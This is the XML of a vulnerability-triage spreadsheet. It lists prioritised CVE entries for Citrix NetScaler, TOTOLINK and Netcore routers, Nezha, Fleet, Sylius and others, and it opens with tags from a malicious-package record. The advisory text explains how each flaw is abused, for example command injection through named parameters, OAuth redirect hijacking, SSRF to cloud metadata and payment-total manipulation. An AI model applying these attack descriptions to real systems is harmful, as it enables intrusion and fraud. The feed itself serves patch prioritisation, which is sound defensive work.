 - The package contains code to detect if it is running in a sandbox environment.
 - malware
 - native-extension
 - steganography
 - c2-in-blockchain
</t>
        </is>
      </c>
      <c r="T410" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17240</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T410"/>
  <conditionalFormatting sqref="E2:E410">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410">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5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Updated - CVSS changed (9.5 → 9.8)</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88771</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Improper input validation vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to an unauthenticated attacker to execute arbitrary commands.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88771</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.5 → 8.1)</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88772</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to Remote Code Execution or Denial of Service</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88772</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.3 → 10.0)</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88773</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Inconsistent interpretation of HTTP requests ('HTTP Request/Response smuggling') vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1-37.279 and NDcPP; Gateway: before 14.1-73.37 FIPS and before 13.1-64.23.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88773</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 9.8)</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88775</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>Memory overflow vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading Memory overflow vulnerability leading to unpredictable or erroneous behavior or Denial of Service</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88775</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 9.8)</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88776</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Memory overflow vulnerability vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23  leading to unpredictable or erroneous behavior or Denial of Service</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88776</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 9.8)</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88777</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Memory overflow vulnerability vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23  leading to unpredictable or erroneous behavior or Denial of Service</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88777</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (10.0 → 9.3)</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100886</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Seetong T8108, T8108P, T8116 and T8232 4.6.1.4-build202604241011. The affected element is an unknown function of the component Debug Service. Such manipulation leads to improper authentication. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100886</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (10.0 → 9.3)</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101001</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Netcore NBR200V2 1.3.241127.071246. This impacts the function eval of the file /www/cgi-bin/network_tools of the component Web Management Interface. Such manipulation of the argument QUERY_STRING leads to os command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101001</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101090</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/nezhahq/nezha</t>
        </is>
      </c>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>Nezha 2.2.3 contains a Host header injection regression in the OAuth2 redirect endpoint. When the new optional dashboard_host setting is empty, /api/v1/oauth2/{provider} (cmd/dashboard/controller/oauth2.go) reflects the attacker-supplied HTTP Host header into the redirect_uri sent to the identity provider instead of falling back to the configured install_host. An attacker who induces a victim to begin OAuth2 login via a request that reaches Nezha with a forged Host header can cause an attacker-controlled callback URL to be used as the redirect_uri; if the OAuth2 provider accepts it, the victim's authorization code is delivered to the attacker origin, allowing the attacker to complete the OAuth2 login/binding flow and take over the account. This regresses the fix for GHSA-9rc6-8cjv-rcvx and is configuration-dependent (dashboard_host empty). At the time of the advisory no patched version was available.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101090</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.0 → 8.9)</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101045</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Fleet-maintained app install and uninstall scripts for macOS are generated from Homebrew cask metadata. In manifests generated before 2026-08-19, the script generator escaped this metadata at some interpolation sites but not all of them, so cask metadata containing shell metacharacters (for example $(...) command substitution) could be carried into scripts that execute as root on managed macOS hosts. An attacker who could land crafted metadata in an upstream Homebrew cask — without needing any Fleet credentials — could achieve arbitrary command execution as root on managed macOS hosts that install or uninstall the affected Fleet-maintained app; exploitation required the crafted metadata to pass both upstream Homebrew cask review and Fleet's review of the automated ingestion pull request. The fix (fleetdm/fleet#51324) landed in Fleet's ingestion pipeline on 2026-08-19 so that all manifests generated on or after that date escape cask metadata at every interpolation site; because manifests are generated centrally and distributed as pre-built content, remediation applied to all deployments with no customer action, and the code fix is included in Fleet v4.92.0.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101045</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 8.7)</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100872</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Sylius versions before 2.1.16 and 2.2.9 fail to validate payment amounts during cart recalculation, allowing unauthenticated attackers to modify order totals after gateway transaction initiation. Attackers can pay a small amount, enlarge the order after gateway capture, and have the system mark the inflated order as fully paid while the gateway captured only the original amount.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100872</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.9 → 8.6)</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100896</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in TOTOLINK N150RT 3.4.0-B20201030. The affected element is the function system of the file /boafrm/formWlSiteSurvey of the component Web Management Interface. This manipulation of the argument wlanif causes os command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100896</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.2 → 8.4)</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101060</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>python-utcp versions before 1.1.4 contain a server-side request forgery vulnerability in HttpCommunicationProtocol.call_tool that validates the initial tool URL but follows HTTP redirects without re-validating the target. Attackers controlling a tool endpoint can return a 302 redirect to internal services, allowing the UTCP client to reach cloud metadata endpoints or internal HTTP services and return their response bodies to the caller.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101060</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 8.3)</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101049</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Heym before 0.0.53 fails to verify Slack request signatures when trigger nodes lack credential IDs or have empty signing secrets. Remote unauthenticated attackers can send forged Slack events to known webhook URLs to trigger workflows with the owner's credentials.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101049</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 8.3)</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101050</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
